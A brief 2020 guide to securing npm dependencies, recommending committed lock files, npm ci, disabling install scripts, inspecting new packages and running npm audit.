N. P. O'Donnell, 2020
- NPM website: npmjs.org
The package-lock.json
is generated during npm i
and should be included in source control. Its purpose is to lock all direct and transitive dependencies at specific minor versions for deterministic builds.
Changing the version of a package in package.json
such that it goes out of sync with package-lock.json
will cause NPM to install the version from package.json
, which can be a security concern. To prevent this, run npm ci
instead of npm i
. This will delete the node_modules
folder, and install dependencies strictly from the package-lock.json
only. The install will fail if any inconsistencies are detected between package-lock.json
and package.json
. Unlike npm i
, npm ci
will never modify package-lock.json
.
When installling a package, always pass the --ignore-scripts
option to prevent scripts from being run. To make this happen by deafult, update the NPM config:
npm config set ignore-scripts true
Manually inspect the package.json
of any new or unknown package for anything odd before running any NPM commands. There are ways for attackers to have arbitrary scripts run from nothing but an NPM install. See this video.
When a new major version of a package is released, wait for it to be adopted by the community and for any early issues to be caught before upgrading to it. When updating minor versions for security/bug fixes, run npm updated
to see which packages are out of date and update each package individually. Read release notes, and ensure you understand the implications of each update.
Use npm audit
to scan for security vulnerabilities in your dependencies.